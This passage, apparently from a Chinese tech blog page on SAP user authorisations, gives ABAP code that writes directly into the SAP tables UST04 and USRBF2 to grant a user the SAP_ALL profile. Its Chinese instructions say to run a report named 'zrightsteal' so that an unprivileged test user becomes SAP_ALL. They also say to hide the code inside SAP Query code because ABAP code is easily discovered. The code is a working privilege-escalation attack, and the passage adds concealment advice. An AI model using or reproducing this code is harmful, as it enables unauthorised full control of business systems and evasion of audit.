? ? *ZUST04-MANDT = '200'.?
? ? *ZUST04-BNAME = 'ZABC2'.?
? ? *ZUST04-PROFILE = 'SAP_ALL'.?
? ? *Insert UST04 from ZUST04 .
? ? select * from USRBF2 into table ZUSRBF2?
? ? where BNAME = 'SAP*' .?
? ? Loop at ZUSRBF2.?
? ? ZUSRBF2-BNAME = 'ZABC2'.?
? ? Modify ZUSRBF2 INDEX sy-tabix TRANSPORTING BNAME.?
? ? endloop.?
? ? INSERT USRBF2 FROM TABLE ZUSRBF2 ACCEPTING DUPLICATE KEYS.
? ? 自己建立一個ztest用戶不給它任何權限然后在test machine上run 報表zrightsteal.
? ? 然后ztest就是SAP_ALL了, 然后你將code hide在SQP query的code中.ABAPcode太容易被人發現。
與50位技術專家面對面20年技術見證,附贈技術全景圖
總結
以上是生活随笔為你收集整理的SAP用户权限相关操作的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: SAP修改数据表(tables)的方法
- 下一篇: SAP常见的几个接口技术的区别